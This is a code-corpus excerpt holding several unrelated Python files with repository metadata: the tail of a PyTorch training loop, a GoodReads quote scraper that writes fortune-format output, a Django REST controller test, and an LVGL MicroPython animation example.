loss = nn.CrossEntropyLoss()(pred,score.long())
avg_loss.append(loss.item())
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if iter%max(1,len(self.train_loader)//10)==0:
print('epoch={}, {}/{}, train_loss={}'.format(self.epoch, iter, len(self.train_loader), loss.item()))
avg_loss = np.array(avg_loss).mean()
if avg_loss<self.best_train:
self.best_train = avg_loss
checkpoint_data = {'epoch': self.epoch, 'state_dict': self.model.state_dict(), 'best_res': self.best_train}
dir = "{}/best_train.pth.tar".format(self.cfg['save_dir'])
torch.save(checkpoint_data, dir,_use_new_zipfile_serialization=False)
def val_loop(self):
self.model.eval()
avg_loss = []
with torch.no_grad():
for iter,batch in enumerate(self.val_loader):
input_data = batch['input'].cuda().float()
score = batch['score'].cuda().float()
pred, l4_points = self.model(input_data)
loss = -(pred.argmax(dim=-1)==score).sum().float()/score.shape[0]
avg_loss.append(loss.item())
if iter%max(1,len(self.val_loader)//10)==0:
print('epoch={}, {}/{}, val_loss={}'.format(self.epoch,iter,len(self.val_loader),loss.item()))
avg_loss = np.array(avg_loss).mean()
if avg_loss<self.best_val:
self.best_val = avg_loss
checkpoint_data = {'epoch': self.epoch, 'state_dict': self.model.state_dict(), 'best_res': self.best_val}
dir = "{}/best_val.pth.tar".format(self.cfg['save_dir'])
torch.save(checkpoint_data, dir,_use_new_zipfile_serialization=False)
def train(self):
for self.epoch in range(self.cfg['n_epochs']):
np.random.seed(self.cfg['random_seed']+self.epoch)
print('epoch {}/{}'.format(self.epoch, self.cfg['n_epochs']))
begin = time.time()
self.train_loop()
print("train loop time: {} s".format(time.time()-begin))
print(">>>>>>>>>>>>>>>>>>>>")
begin = time.time()
self.val_loop()
print("val loop time: {} s".format(time.time()-begin))
print(">>>>>>>>>>>>>>>>>>>>")
self.scheduler.step()
| 36.939655
| 216
| 0.676779
|
0b3c1d04bb9c4412bce6f776ddba306f1328cd5c
| 1,182
|
py
|
Python
|
bin/goodreadsquotes.py
|
shlomif/fortunes
|
41ba7913f1ec208c0d4264610fd78a50ac3cd4f2
|
[
"Unlicense"
] | 18
|
2019-07-27T04:49:54.000Z
|
2022-02-26T18:23:55.000Z
|
bin/goodreadsquotes.py
|
JKirchartz/fortune
|
2e32ba0a57e3842dc06c8128d880ab4c8ec3aefc
|
[
"Unlicense"
] | 2
|
2019-11-07T18:24:11.000Z
|
2022-03-17T03:38:26.000Z
|
bin/goodreadsquotes.py
|
JKirchartz/fortune
|
2e32ba0a57e3842dc06c8128d880ab4c8ec3aefc
|
[
"Unlicense"
] | 4
|
2020-02-04T18:29:23.000Z
|
2021-08-21T17:26:32.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyleft (ↄ) 2016 jkirchartz <me@jkirchartz.com>
#
# Distributed under terms of the NPL (Necessary Public License) license.
"""
Download all quotes from GoodReads by author's quote URL, print in fortune format
usage:
python goodreadsquotes.py https://www.goodreads.com/author/quotes/1791.Seth_Godin > godin
"""
from pyquery import PyQuery
import sys, random, re, time
AUTHOR_REX = re.compile('\d+\.(\w+)$')
def grabber(base_url, i=1):
url = base_url + "?page=" + str(i)
page = PyQuery(url)
quotes = page(".quoteText")
auth_match = re.search(AUTHOR_REX, base_url)
if auth_match:
author = re.sub('_', ' ', auth_match.group(1))
else:
author = False
# sys.stderr.write(url + "\n")
for quote in quotes.items():
quote = quote.remove('script').text().encode('ascii', 'ignore')
if author:
quote = quote.replace(author, " -- " + author)
print quote
print '%'
if not page('.next_page').hasClass('disabled'):
time.sleep(10)
grabber(base_url, i + 1)
if __name__ == "__main__":
grabber(''.join(sys.argv[1:]))
| 27.488372
| 97
| 0.626058
|
65fa614b9639c7c159e427932bcec9916247ffb9
| 409
|
py
|
Python
|
tests/test_controller_with_output_template.py
|
EvgenySmekalin/winter
|
24b6a02f958478547a4a120324823743a1f7e1a1
|
[
"MIT"
] | 9
|
2019-01-24T11:50:19.000Z
|
2019-07-05T07:58:46.000Z
|
tests/test_controller_with_output_template.py
|
EvgenySmekalin/winter
|
24b6a02f958478547a4a120324823743a1f7e1a1
|
[
"MIT"
] | 100
|
2019-01-29T08:11:38.000Z
|
2020-04-03T12:00:42.000Z
|
tests/test_controller_with_output_template.py
|
EvgenySmekalin/winter
|
24b6a02f958478547a4a120324823743a1f7e1a1
|
[
"MIT"
] | 8
|
2020-07-16T13:56:50.000Z
|
2021-12-27T03:33:23.000Z
|
from http import HTTPStatus
from rest_framework.test import APIClient
from tests.entities import AuthorizedUser
def test_controller_with_output_template():
client = APIClient()
user = AuthorizedUser()
client.force_authenticate(user)
response = client.get('/with-output-template/?name=John')
assert response.status_code == HTTPStatus.OK
assert response.content == b'Hello, John!'
| 24.058824
| 61
| 0.755501
|
26ccc12da4dbe6b4fdc02f6df76aa4a1fa4439a2
| 1,064
|
py
|
Python
|
anim/lv_example_anim_1.py
|
shownb/lv_mpy_examples_v8
|
ae09b2d591ed182f2746274269dade7e6b93a6fe
|
[
"MIT"
] | 3
|
2021-04-30T10:13:38.000Z
|
2021-12-06T05:51:09.000Z
|
anim/lv_example_anim_1.py
|
shownb/lv_mpy_examples_v8
|
ae09b2d591ed182f2746274269dade7e6b93a6fe
|
[
"MIT"
] | null | null | null |
anim/lv_example_anim_1.py
|
shownb/lv_mpy_examples_v8
|
ae09b2d591ed182f2746274269dade7e6b93a6fe
|
[
"MIT"
] | 2
|
2021-06-01T15:35:40.000Z
|
2021-11-29T21:21:04.000Z
|
#!/opt/bin/lv_micropython -i
import time
import lvgl as lv
import display_driver
def anim_x_cb(label, v):
label.set_x(v)
def sw_event_cb(e,label):
sw = e.get_target()
if sw.has_state(lv.STATE.CHECKED):
a = lv.anim_t()
a.init()
a.set_var(label)
a.set_values(label.get_x(), 100)
a.set_time(500)
a.set_path_cb(lv.anim_t.path_overshoot)
a.set_custom_exec_cb(lambda a,val: anim_x_cb(label,val))
lv.anim_t.start(a)
else:
a = lv.anim_t()
a.init()
a.set_var(label)
a.set_values(label.get_x(), -label.get_width())
a.set_time(500)
a.set_path_cb(lv.anim_t.path_ease_in)
a.set_custom_exec_cb(lambda a,val: anim_x_cb(label,val))
lv.anim_t.start(a)
#
# Start animation on an event
#
label = lv.label(lv.scr_act())
label.set_text("Hello animations!")
label.set_pos(100, 10)
sw = lv.switch(lv.scr_act())
sw.center()
sw.add_state(lv.STATE.CHECKED)
sw.add_event_cb(lambda e: sw_event_cb(e,label), lv.EVENT.VALUE_CHANGED, None)
| 22.638298
| 77
| 0.642857
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.